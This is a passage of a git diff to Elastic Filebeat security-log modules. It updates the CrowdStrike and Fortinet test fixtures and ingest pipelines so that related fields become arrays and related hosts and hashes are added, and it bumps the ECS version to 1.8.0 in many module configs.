"192.168.6.8", "tags": [ @@ -198,8 +228,12 @@ ], "log.offset": 2645, "message": "CrowdStrike Authentication", - "related.ip": "192.168.6.3", - "related.user": "bob@company.com", + "related.ip": [ + "192.168.6.3" + ], + "related.user": [ + "bob@company.com" + ], "service.type": "crowdstrike", "source.ip": "192.168.6.3", "tags": [ @@ -247,8 +281,12 @@ ], "log.offset": 3136, "message": "update_group", - "related.ip": "192.168.6.13", - "related.user": "chris@company.com", + "related.ip": [ + "192.168.6.13" + ], + "related.user": [ + "chris@company.com" + ], "service.type": "crowdstrike", "source.ip": "192.168.6.13", "tags": [ @@ -293,8 +331,12 @@ ], "log.offset": 3858, "message": "CrowdStrike Authentication", - "related.ip": "192.168.6.8", - "related.user": "alice@company.com", + "related.ip": [ + "192.168.6.8" + ], + "related.user": [ + "alice@company.com" + ], "service.type": "crowdstrike", "source.ip": "192.168.6.8", "tags": [ @@ -333,8 +375,12 @@ ], "log.offset": 4506, "message": "CrowdStrike Authentication", - "related.ip": "192.168.6.8", - "related.user": "alice@company.com", + "related.ip": [ + "192.168.6.8" + ], + "related.user": [ + "alice@company.com" + ], "service.type": "crowdstrike", "source.ip": "192.168.6.8", "tags": [ @@ -379,8 +425,12 @@ ], "log.offset": 4999, "message": "CrowdStrike Authentication", - "related.ip": "192.168.6.8", - "related.user": "alice@company.com", + "related.ip": [ + "192.168.6.8" + ], + "related.user": [ + "alice@company.com" + ], "service.type": "crowdstrike", "source.ip": "192.168.6.8", "tags": [ @@ -419,8 +469,12 @@ ], "log.offset": 5646, "message": "CrowdStrike Authentication", - "related.ip": "192.168.6.8", - "related.user": "alice@company.com", + "related.ip": [ + "192.168.6.8" + ], + "related.user": [ + "alice@company.com" + ], "service.type": "crowdstrike", "source.ip": "192.168.6.8", "tags": [ @@ -459,8 +513,12 @@ ], "log.offset": 6134, "message": "CrowdStrike Authentication", - "related.ip": "192.168.6.8", - "related.user": "alice@company.com", + "related.ip": [ + "192.168.6.8" + ], + "related.user": [ + "alice@company.com" + ], "service.type": "crowdstrike", "source.ip": "192.168.6.8", "tags": [ @@ -499,8 +557,12 @@ ], "log.offset": 6627, "message": "CrowdStrike Authentication", - "related.ip": "192.168.6.8", - "related.user": "alice@company.com", + "related.ip": [ + "192.168.6.8" + ], + "related.user": [ + "alice@company.com" + ], "service.type": "crowdstrike", "source.ip": "192.168.6.8", "tags": [ @@ -556,8 +618,12 @@ ], "log.offset": 7113, "message": "detection_update", - "related.ip": "192.168.6.8", - "related.user": "alice@company.com", + "related.ip": [ + "192.168.6.8" + ], + "related.user": [ + "alice@company.com" + ], "service.type": "crowdstrike", "source.ip": "192.168.6.8", "tags": [ diff --git a/x-pack/filebeat/module/crowdstrike/falcon/test/falcon-events.log-expected.json b/x-pack/filebeat/module/crowdstrike/falcon/test/falcon-events.log-expected.json index eab6fb1db0eb..0756dfac4772 100644 --- a/x-pack/filebeat/module/crowdstrike/falcon/test/falcon-events.log-expected.json +++ b/x-pack/filebeat/module/crowdstrike/falcon/test/falcon-events.log-expected.json @@ -73,7 +73,19 @@ "process.executable": "C:\\Windows\\Explorer.EXE", "process.name": "explorer.exe", "process.pid": 38684386611, - "related.ip": "192.168.12.51", + "related.hash": [ + "6a671b92a69755de6fd063fcbe4ba926d83b49f78c42dbaeed8cdb6bbc57576a", + "ac4c51eb24aa95b77f705ab159189e24" + ], + "related.hosts": [ + "alice-laptop" + ], + "related.ip": [ + "192.168.12.51" + ], + "related.user": [ + "alice" + ], "rule.description": "Terminated a process related to the deletion of backups, which is often indicative of ransomware activity.", "rule.name": "Process Terminated", "service.type": "crowdstrike", @@ -159,7 +171,9 @@ ], "log.offset": 2579, "message": "quarantined_file_update", - "related.user": "Crowdstrike", + "related.user": [ + "Crowdstrike" + ], "service.type": "crowdstrike", "tags": [ "forwarded" diff --git a/x-pack/filebeat/module/crowdstrike/falcon/test/falcon-sample.log-expected.json b/x-pack/filebeat/module/crowdstrike/falcon/test/falcon-sample.log-expected.json index becdbecc7c8c..dd277a3f2c9f 100644 --- a/x-pack/filebeat/module/crowdstrike/falcon/test/falcon-sample.log-expected.json +++ b/x-pack/filebeat/module/crowdstrike/falcon/test/falcon-sample.log-expected.json @@ -33,7 +33,9 @@ "crowdstrike.metadata.version": "1.0", "destination.ip": "10.37.60.194", "destination.port": 445, - "event.action": "firewall_match_event", + "event.action": [ + "firewall_match_event" + ], "event.category": [ "network" ], @@ -41,9 +43,7 @@ "event.dataset": "crowdstrike.falcon_endpoint", "event.kind": "event", "event.module": "crowdstrike", - "event.outcome": [ - "unknown" - ], + "event.outcome": "unknown", "event.type": [ "start", "connection" @@ -59,6 +59,9 @@ "network.direction": "ingress", "network.type": "ipv4", "process.pid": 206158879910, + "related.hosts": [ + "TESTDEVICE01" + ], "related.ip": [ "10.37.60.21", "10.37.60.194" @@ -163,8 +166,12 @@ ], "log.offset": 2041, "message": "Crowdstrike Authentication", - "related.ip": "165.225.220.184", - "related.user": "first.last@company.com", + "related.ip": [ + "165.225.220.184" + ], + "related.user": [ + "first.last@company.com" + ], "service.type": "crowdstrike", "source.ip": "165.225.220.184", "tags": [ @@ -211,7 +218,9 @@ ], "log.offset": 3219, "message": "quarantined_file_update", - "related.user": "Crowdstrike", + "related.user": [ + "Crowdstrike" + ], "service.type": "crowdstrike", "tags": [ "forwarded" @@ -228,13 +237,19 @@ "crowdstrike.metadata.eventType": "RemoteResponseSessionStartEvent", "crowdstrike.metadata.offset": 57217, "crowdstrike.metadata.version": "1.0", - "event.action": "remote_response_session_start_event", + "event.action": [ + "remote_response_session_start_event" + ], + "event.category": [ + "network" + ], "event.dataset": "crowdstrike.falcon_audit", "event.kind": "event", "event.module": "crowdstrike", "event.outcome": "unknown", "event.type": [ - "start" + "start", + "session" ], "fileset.name": "falcon", "host.name": "TESTDEVICE01", @@ -243,8 +258,13 @@ "multiline" ], "log.offset": 4017, - "message": "Remote response session started", - "related.user": "first.last@company.com", + "message": "Remote response session started.", + "related.hosts": [ + "TESTDEVICE01" + ], + "related.user": [ + "first.last@company.com" + ], "service.type": "crowdstrike", "tags": [ "forwarded" @@ -273,13 +293,19 @@ "crowdstrike.metadata.eventType": "RemoteResponseSessionEndEvent", "crowdstrike.metadata.offset": 57269, "crowdstrike.metadata.version": "1.0", - "event.action": "remote_response_session_end_event", + "event.action": [ + "remote_response_session_end_event" + ], + "event.category": [ + "network" + ], "event.dataset": "crowdstrike.falcon_audit", "event.kind": "event", "event.module": "crowdstrike", "event.outcome": "unknown", "event.type": [ - "end" + "end", + "session" ], "fileset.name": "falcon", "host.name": "TESTDEVICE01", @@ -288,8 +314,13 @@ "multiline" ], "log.offset": 4466, - "message": "Remote response session ended", - "related.user": "first.last@company.com", + "message": "Remote response session ended.", + "related.hosts": [ + "TESTDEVICE01" + ], + "related.user": [ + "first.last@company.com" + ], "service.type": "crowdstrike", "tags": [ "forwarded" @@ -335,7 +366,6 @@ "crowdstrike.event.LocalIP": "10.1.190.117", "crowdstrike.event.MACAddress": "54-ad-d4-d2-a8-0b", "crowdstrike.event.MD5String": "0ab1235adca04aef6239f5496ef0a5df", - "crowdstrike.event.MachineDomain": "NA", "crowdstrike.event.Objective": "Falcon Detection Method", "crowdstrike.event.ParentCommandLine": "C:\\Windows\\Explorer.EXE", "crowdstrike.event.ParentImageFileName": "\\Device\\HarddiskVolume2\\Windows\\explorer.exe", @@ -402,13 +432,25 @@ "process.args": [ "\"C:\\ProgramData\\file\\path\\filename.exe\"" ], - "process.command_line": "\"C:\\ProgramData\\file\\path\\filename.exe\" ", + "process.command_line": "\"C:\\ProgramData\\file\\path\\filename.exe\"", "process.executable": "\"C:\\ProgramData\\file\\path\\filename.exe\"", "process.name": "filename.exe", "process.parent.command_line": "C:\\Windows\\Explorer.EXE", "process.parent.executable": "\\Device\\HarddiskVolume2\\Windows\\explorer.exe", "process.pid": 663790158277, - "related.ip": "10.1.190.117", + "related.hash": [ + "0a123b185f9a32fde1df59897089014c92e3d08a0533b54baa72ba2a93d64deb", + "0ab1235adca04aef6239f5496ef0a5df" + ], + "related.hosts": [ + "TESTDEVICE01" + ], + "related.ip": [ + "10.1.190.117" + ], + "related.user": [ + "First.last" + ], "rule.description": "This file meets the machine learning-based on-sensor AV protection's low confidence threshold for malicious files.", "rule.name": "NGAV", "service.type": "crowdstrike", diff --git a/x-pack/filebeat/module/cyberark/corepas/config/input.yml b/x-pack/filebeat/module/cyberark/corepas/config/input.yml index caf07675b0f6..49b1e4ef20b0 100644 --- a/x-pack/filebeat/module/cyberark/corepas/config/input.yml +++ b/x-pack/filebeat/module/cyberark/corepas/config/input.yml @@ -84,4 +84,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/cylance/protect/config/input.yml b/x-pack/filebeat/module/cylance/protect/config/input.yml index 7727cd2b81e7..9e7cfc5a0fdc 100644 --- a/x-pack/filebeat/module/cylance/protect/config/input.yml +++ b/x-pack/filebeat/module/cylance/protect/config/input.yml @@ -84,4 +84,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/envoyproxy/log/config/envoyproxy.yml b/x-pack/filebeat/module/envoyproxy/log/config/envoyproxy.yml index 8c4509eb2270..162208f2e80a 100644 --- a/x-pack/filebeat/module/envoyproxy/log/config/envoyproxy.yml +++ b/x-pack/filebeat/module/envoyproxy/log/config/envoyproxy.yml @@ -9,4 +9,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/f5/bigipafm/config/input.yml b/x-pack/filebeat/module/f5/bigipafm/config/input.yml index 28e46f847ab7..9166fe8a62fc 100644 --- a/x-pack/filebeat/module/f5/bigipafm/config/input.yml +++ b/x-pack/filebeat/module/f5/bigipafm/config/input.yml @@ -84,4 +84,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/f5/bigipapm/config/input.yml b/x-pack/filebeat/module/f5/bigipapm/config/input.yml index de1b11667744..9ca732182468 100644 --- a/x-pack/filebeat/module/f5/bigipapm/config/input.yml +++ b/x-pack/filebeat/module/f5/bigipapm/config/input.yml @@ -84,4 +84,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/fortinet/clientendpoint/config/input.yml b/x-pack/filebeat/module/fortinet/clientendpoint/config/input.yml index b0d8c7684d80..833d5dae4a47 100644 --- a/x-pack/filebeat/module/fortinet/clientendpoint/config/input.yml +++ b/x-pack/filebeat/module/fortinet/clientendpoint/config/input.yml @@ -7,7 +7,13 @@ paths: {{ end }} exclude_files: [".gz$"] -{{ else }} +{{ else if eq .input "tcp" }} + +type: {{.input}} +host: "{{.syslog_host}}:{{.syslog_port}}" +framing: rfc6587 + +{{ else if eq .input "udp" }} type: {{.input}} host: "{{.syslog_host}}:{{.syslog_port}}" @@ -84,4 +90,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/fortinet/firewall/config/firewall.yml b/x-pack/filebeat/module/fortinet/firewall/config/firewall.yml index cddd13573a4e..61f503d7f996 100644 --- a/x-pack/filebeat/module/fortinet/firewall/config/firewall.yml +++ b/x-pack/filebeat/module/fortinet/firewall/config/firewall.yml @@ -2,6 +2,7 @@ type: tcp host: "{{.syslog_host}}:{{.syslog_port}}" +framing: rfc6587 {{ else if eq .input "udp" }} @@ -27,7 +28,7 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 {{ if .external_interfaces }} - add_fields: diff --git a/x-pack/filebeat/module/fortinet/firewall/ingest/event.yml b/x-pack/filebeat/module/fortinet/firewall/ingest/event.yml index 8278c538c262..4e299f4be086 100644 --- a/x-pack/filebeat/module/fortinet/firewall/ingest/event.yml +++ b/x-pack/filebeat/module/fortinet/firewall/ingest/event.yml @@ -242,93 +242,6 @@ processors: type: integer ignore_failure: true ignore_missing: true -- geoip: - field: source.ip - target_field: source.geo - ignore_missing: true - if: "ctx.source?.geo == null" -- geoip: - field: destination.ip - target_field: destination.geo - ignore_missing: true - if: "ctx.destination?.geo == null" -- geoip: - database_file: GeoLite2-ASN.mmdb - field: source.ip - target_field: source.as - properties: - - asn - - organization_name - ignore_missing: true -- geoip: - database_file: GeoLite2-ASN.mmdb - field: destination.ip - target_field: destination.as - properties: - - asn - - organization_name - ignore_missing: true -- geoip: - field: source.nat.ip - target_field: source.geo - ignore_missing: true - if: "ctx.source?.geo == null" -- geoip: - field: destination.nat.ip - target_field: destination.geo - ignore_missing: true - if: "ctx.destination?.geo == null" -- geoip: - database_file: GeoLite2-ASN.mmdb - field: source.nat.ip - target_field: source.as - properties: - - asn - - organization_name - ignore_missing: true - if: "ctx.source?.as == null" -- geoip: - database_file: GeoLite2-ASN.mmdb - field: destination.nat.ip - target_field: destination.as - properties: - - asn - - organization_name - ignore_missing: true - if: "ctx.destination?.as == null" -- rename: - field: source.as.asn - target_field: source.as.number - ignore_missing: true -- rename: - field: source.as.organization_name - target_field: source.as.organization.name - ignore_missing: true -- rename: - field: destination.as.asn - target_field: destination.as.number - ignore_missing: true -- rename: - field: destination.as.organization_name - target_field: destination.as.organization.name - ignore_missing: true -- script: - lang: painless - source: ctx.network.bytes = ctx.source.bytes + ctx.destination.bytes - if: "ctx?.source?.bytes != null && ctx?.destination?.bytes != null" - ignore_failure: true -- append: - field: related.ip - value: "{{source.ip}}" - if: "ctx.source?.ip != null" -- append: - field: related.ip - value: "{{destination.ip}}" - if: "ctx.destination?.ip != null" -- append: - field: related.user - value: "{{source.user.name}}" - if: "ctx.source?.user?.name != null" - remove: field: - fortinet.firewall.dstport diff --git a/x-pack/filebeat/module/fortinet/firewall/ingest/pipeline.yml b/x-pack/filebeat/module/fortinet/firewall/ingest/pipeline.yml index a227d7700829..c103fd147007 100644 --- a/x-pack/filebeat/module/fortinet/firewall/ingest/pipeline.yml +++ b/x-pack/filebeat/module/fortinet/firewall/ingest/pipeline.yml @@ -15,14 +15,17 @@ processors: ignore_missing: true ignore_failure: false trim_value: "\"" -- remove: - field: fortinet.tmp.assignip - if: "ctx.fortinet?.tmp?.assignip == 'N/A'" - ignore_missing: true - rename: field: fortinet.tmp target_field: fortinet.firewall ignore_missing: true +- script: + lang: painless + source: | + def fw = ctx?.fortinet?.firewall; + if (fw != null) { + fw.entrySet().removeIf(entry -> entry.getValue() == "N/A"); + } - set: field: observer.vendor value: Fortinet @@ -134,36 +137,6 @@ processors: field: fortinet.firewall.level target_field: log.level ignore_missing: true -- remove: - field: fortinet.firewall.assignip - if: "ctx.fortinet?.firewall?.assignip == 'N/A'" -- remove: - field: fortinet.firewall.dstip - if: "ctx.fortinet?.firewall?.dstip == 'N/A'" -- remove: - field: fortinet.firewall.srcip - if: "ctx.fortinet?.firewall?.srcip == 'N/A'" -- remove: - field: fortinet.firewall.remip - if: "ctx.fortinet?.firewall?.remip == 'N/A'" -- remove: - field: fortinet.firewall.locip - if: "ctx.fortinet?.firewall?.locip == 'N/A'" -- remove: - field: fortinet.firewall.group - if: "ctx.fortinet?.firewall?.group == 'N/A'" -- remove: - field: fortinet.firewall.user - if: "ctx.fortinet?.firewall?.user == 'N/A'" -- remove: - field: fortinet.firewall.tranip - if: "ctx.fortinet?.firewall?.tranip == 'N/A'" -- remove: - field: fortinet.firewall.transip - if: "ctx.fortinet?.firewall?.transip == 'N/A'" -- remove: - field: fortinet.firewall.tunnelip - if: "ctx.fortinet?.firewall?.tunnelip == 'N/A'" # Handle interface-based network directionality - set: field: network.direction @@ -259,6 +232,128 @@ processors: field: fortinet.firewall.size type: long ignore_missing: true +- geoip: + field: source.ip + target_field: source.geo + ignore_missing: true + if: "ctx.source?.geo == null" +- geoip: + field: destination.ip + target_field: destination.geo + ignore_missing: true + if: "ctx.destination?.geo == null" +- geoip: + database_file: GeoLite2-ASN.mmdb + field: source.ip + target_field: source.as + properties: + - asn + - organization_name + ignore_missing: true +- geoip: + database_file: GeoLite2-ASN.mmdb + field: destination.ip + target_field: destination.as + properties: + - asn + - organization_name + ignore_missing: true +- geoip: + field: source.nat.ip + target_field: source.geo + ignore_missing: true + if: "ctx.source?.geo == null" +- geoip: + field: destination.nat.ip + target_field: destination.geo + ignore_missing: true + if: "ctx.destination?.geo == null" +- geoip: + database_file: GeoLite2-ASN.mmdb + field: source.nat.ip + target_field: source.as + properties: + - asn + - organization_name + ignore_missing: true + if: "ctx.source?.as == null" +- geoip: + database_file: GeoLite2-ASN.mmdb + field: destination.nat.ip + target_field: destination.as + properties: + - asn + - organization_name + ignore_missing: true + if: "ctx.destination?.as == null" +- rename: + field: source.as.asn + target_field: source.as.number + ignore_missing: true +- rename: + field: source.as.organization_name + target_field: source.as.organization.name + ignore_missing: true +- rename: + field: destination.as.asn + target_field: destination.as.number + ignore_missing: true +- rename: + field: destination.as.organization_name + target_field: destination.as.organization.name + ignore_missing: true +- script: + lang: painless + source: "ctx.network.bytes = ctx.source.bytes + ctx.destination.bytes" + if: "ctx?.source?.bytes != null && ctx?.destination?.bytes != null" + ignore_failure: true +- script: + lang: painless + source: "ctx.network.packets = ctx.source.packets + ctx.destination.packets" + if: "ctx?.source?.packets != null && ctx?.destination?.packets != null" + ignore_failure: true +- append: + field: related.ip + value: "{{source.ip}}" + if: "ctx.source?.ip != null" +- append: + field: related.ip + value: "{{destination.ip}}" + if: "ctx.destination?.ip != null" +- append: + field: related.user + value: "{{source.user.name}}" + if: "ctx.source?.user?.name != null" +- append: + field: related.user + value: "{{destination.user.name}}" + if: "ctx.destination?.user?.name != null" +- append: + field: related.hosts + value: "{{destination.address}}" + if: "ctx.destination?.address != null" +- append: + field: related.hosts + value: "{{source.address}}" + if: "ctx.source?.address != null" +- append: + field: related.hosts + value: "{{dns.question.name}}" + if: "ctx.dns?.question?.name != null" +- script: + lang: painless + source: | + def dnsIPs = ctx?.dns?.resolved_ip; + if (dnsIPs != null && dnsIPs instanceof List) { + if (ctx?.related?.ip == null) { + ctx.related.ip = []; + } + for (ip in dnsIPs) { + if (!ctx.related.ip.contains(ip)) { + ctx.related.ip.add(ip); + } + } + } on_failure: - set: field: error.message diff --git a/x-pack/filebeat/module/fortinet/firewall/ingest/traffic.yml b/x-pack/filebeat/module/fortinet/firewall/ingest/traffic.yml index 051a3eca2f83..5166332e2a1c 100644 --- a/x-pack/filebeat/module/fortinet/firewall/ingest/traffic.yml +++ b/x-pack/filebeat/module/fortinet/firewall/ingest/traffic.yml @@ -200,102 +200,6 @@ processors: field: fortinet.firewall.url target_field: url.path ignore_missing: true -- geoip: - field: source.ip - target_field: source.geo - ignore_missing: true - if: "ctx.source?.geo == null" -- geoip: - field: destination.ip - target_field: destination.geo - ignore_missing: true - if: "ctx.destination?.geo == null" -- geoip: - database_file: GeoLite2-ASN.mmdb - field: source.ip - target_field: source.as - properties: - - asn - - organization_name - ignore_missing: true -- geoip: - database_file: GeoLite2-ASN.mmdb - field: destination.ip - target_field: destination.as - properties: - - asn - - organization_name - ignore_missing: true -- geoip: - field: source.nat.ip - target_field: source.geo - ignore_missing: true - if: "ctx.source?.geo == null" -- geoip: - field: destination.nat.ip - target_field: destination.geo - ignore_missing: true - if: "ctx.destination?.geo == null" -- geoip: - database_file: GeoLite2-ASN.mmdb - field: source.nat.ip - target_field: source.as - properties: - - asn - - organization_name - ignore_missing: true - if: "ctx.source?.as == null" -- geoip: - database_file: GeoLite2-ASN.mmdb - field: destination.nat.ip - target_field: destination.as - properties: - - asn - - organization_name - ignore_missing: true - if: "ctx.destination?.as == null" -- rename: - field: source.as.asn - target_field: source.as.number - ignore_missing: true -- rename: - field: source.as.organization_name - target_field: source.as.organization.name - ignore_missing: true -- rename: - field: destination.as.asn - target_field: destination.as.number - ignore_missing: true -- rename: - field: destination.as.organization_name - target_field: destination.as.organization.name - ignore_missing: true -- script: - lang: painless - source: "ctx.network.bytes = ctx.source.bytes + ctx.destination.bytes" - if: "ctx?.source?.bytes != null && ctx?.destination?.bytes != null" - ignore_failure: true -- script: - lang: painless - source: "ctx.network.packets = ctx.source.packets + ctx.destination.packets" - if: "ctx?.source?.packets != null && ctx?.destination?.packets != null" - ignore_failure: true -- append: - field: related.ip - value: "{{source.ip}}" - if: "ctx.source?.ip != null" -- append: - field: related.ip - value: "{{destination.ip}}" - if: "ctx.destination?.ip != null" -- append: - field: related.user - value: "{{source.user.name}}" - if: "ctx.source?.user?.name != null" -- append: - field: related.user - value: "{{destination.user.name}}" - if: "ctx.destination?.user?.name != null" - remove: field: - fortinet.firewall.dstport @@ -310,4 +214,4 @@ processors: on_failure: - set: field: error.message - value: '{{ _ingest.on_failure_message }}' \ No newline at end of file + value: '{{ _ingest.on_failure_message }}' diff --git a/x-pack/filebeat/module/fortinet/firewall/ingest/utm.yml b/x-pack/filebeat/module/fortinet/firewall/ingest/utm.yml index e3df460546ce..a788aa4c8bc4 100644 --- a/x-pack/filebeat/module/fortinet/firewall/ingest/utm.yml +++ b/x-pack/filebeat/module/fortinet/firewall/ingest/utm.yml @@ -348,93 +348,6 @@ processors: field: fortinet.firewall.filehash target_field: fortinet.file.hash.crc32 ignore_missing: true -- geoip: - field: source.ip - target_field: source.geo - ignore_missing: true - if: "ctx.source?.geo == null" -- geoip: - field: destination.ip - target_field: destination.geo - ignore_missing: true - if: "ctx.destination?.geo == null" -- geoip: - database_file: GeoLite2-ASN.mmdb - field: source.ip - target_field: source.as - properties: - - asn - - organization_name - ignore_missing: true -- geoip: - database_file: GeoLite2-ASN.mmdb - field: destination.ip - target_field: destination.as - properties: - - asn - - organization_name - ignore_missing: true -- geoip: - field: source.nat.ip - target_field: source.geo - ignore_missing: true - if: "ctx.source?.geo == null" -- geoip: - field: destination.nat.ip - target_field: destination.geo - ignore_missing: true - if: "ctx.destination?.geo == null" -- geoip: - database_file: GeoLite2-ASN.mmdb - field: source.nat.ip - target_field: source.as - properties: - - asn - - organization_name - ignore_missing: true - if: "ctx.source?.as == null" -- geoip: - database_file: GeoLite2-ASN.mmdb - field: destination.nat.ip - target_field: destination.as - properties: - - asn - - organization_name - ignore_missing: true - if: "ctx.destination?.as == null" -- rename: - field: source.as.asn - target_field: source.as.number - ignore_missing: true -- rename: - field: source.as.organization_name - target_field: source.as.organization.name - ignore_missing: true -- rename: - field: destination.as.asn - target_field: destination.as.number - ignore_missing: true -- rename: - field: destination.as.organization_name - target_field: destination.as.organization.name - ignore_missing: true -- script: - lang: painless - source: "ctx.network.bytes = ctx.source.bytes + ctx.destination.bytes" - if: "ctx?.source?.bytes != null && ctx?.destination?.bytes != null" - ignore_failure: true -- append: - field: related.ip - value: "{{source.ip}}" - if: "ctx.source?.ip != null" -- append: - field: related.ip - value: "{{destination.ip}}" - if: "ctx.destination?.ip != null" -- append: - field: related.user - value: "{{source.user.name}}" - if: "ctx.source?.user?.name != null" - append: field: related.hash value: "{{fortinet.file.hash.crc32}}" diff --git a/x-pack/filebeat/module/fortinet/firewall/test/fortinet.log-expected.json b/x-pack/filebeat/module/fortinet/firewall/test/fortinet.log-expected.json index 2a485f787f45..172748796d12 100644 --- a/x-pack/filebeat/module/fortinet/firewall/test/fortinet.log-expected.json +++ b/x-pack/filebeat/module/fortinet/firewall/test/fortinet.log-expected.json @@ -427,6 +427,9 @@ "observer.serial_number": "somerouterid", "observer.type": "firewall", "observer.vendor": "Fortinet", + "related.hosts": [ + "elastic.example.com" + ], "related.ip": [ "192.168.2.1", "8.8.8.8" @@ -498,9 +501,13 @@ "observer.serial_number": "somerouterid", "observer.type": "firewall", "observer.vendor": "Fortinet", + "related.hosts": [ + "elastic.example.com" + ], "related.ip": [ "192.168.2.1", - "8.8.8.8" + "8.8.8.8", + "8.8.4.4" ], "rule.category": "Web-based Email", "rule.id": "26", @@ -642,6 +649,9 @@ "observer.serial_number": "somerouterid", "observer.type": "firewall", "observer.vendor": "Fortinet", + "related.hosts": [ + "elastic.co" + ], "related.ip": [ "192.168.2.1", "8.8.8.8" @@ -704,6 +714,9 @@ "observer.serial_number": "somerouterid", "observer.type": "firewall", "observer.vendor": "Fortinet", + "related.hosts": [ + "elastic.co" + ], "related.ip": [ "192.168.2.1", "8.8.8.8" @@ -864,9 +877,6 @@ "fortinet.firewall.subtype": "vpn", "fortinet.firewall.type": "event", "fortinet.firewall.vd": "root", - "fortinet.firewall.vpntunnel": "N/A", - "fortinet.firewall.xauthgroup": "N/A", - "fortinet.firewall.xauthuser": "N/A", "input.type": "log", "log.level": "error", "log.offset": 7112, @@ -934,8 +944,6 @@ "fortinet.firewall.type": "event", "fortinet.firewall.vd": "root", "fortinet.firewall.vpntunnel": "elasticvpn", - "fortinet.firewall.xauthgroup": "N/A", - "fortinet.firewall.xauthuser": "N/A", "input.type": "log", "log.level": "notice", "log.offset": 7680, @@ -1096,8 +1104,6 @@ "fortinet.firewall.type": "event", "fortinet.firewall.vd": "root", "fortinet.firewall.vpntunnel": "testvpn", - "fortinet.firewall.xauthgroup": "N/A", - "fortinet.firewall.xauthuser": "N/A", "input.type": "log", "log.level": "notice", "log.offset": 9122, @@ -1198,7 +1204,6 @@ }, { "@timestamp": "2020-04-23T12:23:47.000-05:00", - "destination.address": "N/A", "destination.as.number": 15169, "destination.as.organization.name": "Google LLC", "destination.geo.continent_name": "North America", @@ -1221,7 +1226,6 @@ ], "fileset.name": "firewall", "fortinet.firewall.action": "ssl-new-con", - "fortinet.firewall.reason": "N/A", "fortinet.firewall.subtype": "vpn", "fortinet.firewall.tunnelid": "2", "fortinet.firewall.tunneltype": "ssl", @@ -1248,7 +1252,6 @@ }, { "@timestamp": "2020-04-23T12:23:47.000-05:00", - "destination.address": "N/A", "destination.as.number": 3356, "destination.as.organization.name": "Level 3 Parent, LLC", "destination.geo.continent_name": "North America", @@ -2005,8 +2008,6 @@ "fortinet.firewall.type": "event", "fortinet.firewall.vd": "root", "fortinet.firewall.vpntunnel": "P1_Test", - "fortinet.firewall.xauthgroup": "N/A", - "fortinet.firewall.xauthuser": "N/A", "input.type": "log", "log.level": "notice", "log.offset": 17123, diff --git a/x-pack/filebeat/module/fortinet/fortimail/config/input.yml b/x-pack/filebeat/module/fortinet/fortimail/config/input.yml index 08b243e6a02f..b4ae86db1ffa 100644 --- a/x-pack/filebeat/module/fortinet/fortimail/config/input.yml +++ b/x-pack/filebeat/module/fortinet/fortimail/config/input.yml @@ -84,4 +84,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/fortinet/fortimanager/config/input.yml b/x-pack/filebeat/module/fortinet/fortimanager/config/input.yml index b20b230f1b61..ff232c9266eb 100644 --- a/x-pack/filebeat/module/fortinet/fortimanager/config/input.yml +++ b/x-pack/filebeat/module/fortinet/fortimanager/config/input.yml @@ -84,4 +84,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/gcp/audit/config/input.yml b/x-pack/filebeat/module/gcp/audit/config/input.yml index 80d6fc9c7812..b1ba0148832d 100644 --- a/x-pack/filebeat/module/gcp/audit/config/input.yml +++ b/x-pack/filebeat/module/gcp/audit/config/input.yml @@ -34,4 +34,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/gcp/firewall/config/input.yml b/x-pack/filebeat/module/gcp/firewall/config/input.yml index 72e6bfaed383..cc914cedfcad 100644 --- a/x-pack/filebeat/module/gcp/firewall/config/input.yml +++ b/x-pack/filebeat/module/gcp/firewall/config/input.yml @@ -38,4 +38,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/gcp/vpcflow/config/input.yml b/x-pack/filebeat/module/gcp/vpcflow/config/input.yml index aa2649a35985..fbcfc88a79ad 100644 --- a/x-pack/filebeat/module/gcp/vpcflow/config/input.yml +++ b/x-pack/filebeat/module/gcp/vpcflow/config/input.yml @@ -37,4 +37,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/google_workspace/admin/config/config.yml b/x-pack/filebeat/module/google_workspace/admin/config/config.yml index 7836da2fa556..8c2c3824ed7e 100644 --- a/x-pack/filebeat/module/google_workspace/admin/config/config.yml +++ b/x-pack/filebeat/module/google_workspace/admin/config/config.yml @@ -15,11 +15,11 @@ request.transforms: - set: target: url.params.startTime value: "[[.cursor.last_execution_datetime]]" - default: '[[now (parseDuration "-{{.initial_interval}}")]]' + default: '[[parseDate now (parseDuration "-{{.initial_interval}}")]]' response.split: target: body.items split: - target: events + target: body.events keep_parent: true response.pagination: - set: @@ -45,7 +45,7 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 - script: lang: javascript id: gworkspace-common diff --git a/x-pack/filebeat/module/google_workspace/admin/config/pipeline.js b/x-pack/filebeat/module/google_workspace/admin/config/pipeline.js index 1071a61aef0a..4e9b5630a0d2 100644 --- a/x-pack/filebeat/module/google_workspace/admin/config/pipeline.js +++ b/x-pack/filebeat/module/google_workspace/admin/config/pipeline.js @@ -422,6 +422,17 @@ var login = (function () { } evt.AppendTo("related.user", data[0]); + evt.Put("user.target.name", data[0]); + evt.Put("user.target.domain", data[1]); + evt.Put("user.target.email", email); + var groupName = evt.Get("group.name"); + if (groupName) { + evt.Put("user.target.group.name", groupName); + } + var groupDomain = evt.Get("group.domain"); + if 